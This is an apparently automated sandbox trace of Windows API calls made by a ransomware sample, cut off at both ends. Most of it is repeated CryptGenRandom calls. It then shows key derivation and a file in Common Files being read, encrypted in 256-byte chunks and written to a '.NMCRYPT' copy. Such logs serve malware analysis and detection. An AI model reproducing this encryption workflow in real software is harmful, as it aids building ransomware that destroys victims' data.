returned 1 [0147.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.778] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0147.779] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0147.779] CryptCreateHash (in: hProv=0x8e37f8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444794 | out: phHash=0x1d444794) returned 1 [0147.779] CryptHashData (hHash=0x9ad2f8, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0147.779] CryptDeriveKey (in: hProv=0x8e37f8, Algid=0x6610, hBaseData=0x9ad2f8, dwFlags=0x4, phKey=0x1d444798 | out: phKey=0x1d444798*=0x9ad5b8) returned 1 [0147.779] CryptSetKeyParam (hKey=0x9ad5b8, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0147.779] CryptSetKeyParam (hKey=0x9ad5b8, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0147.779] wcslen (_String="\\\\?\\") returned 0x4 [0147.779] CryptDuplicateKey (in: hKey=0x9ad5b8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad5f8) returned 1 [0147.779] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptg.xml.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptg.xml.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0147.780] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptg.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptg.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0147.780] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=2240) returned 1 [0147.780] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0147.780] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.781] CryptEncrypt (in: hKey=0x9ad5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.781] GetLastError () returned 0x0 [0147.781] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.782] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.782] CryptEncrypt (in: hKey=0x9ad5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.782] GetLastError () returned 0x0 [0147.782] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.782] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.782] CryptEncrypt (in: hKey=0x9ad5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.782] GetLastError () returned 0x0 [0147.782] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.782] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.782] CryptEncrypt (in: hKey=0x9ad5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.782] GetLastError () returned 0x0 [0147.782] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.782] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.783] CryptEncrypt (in: hKey=0x9ad5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.783] GetLastError () returned 0x0 [0147.783] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, 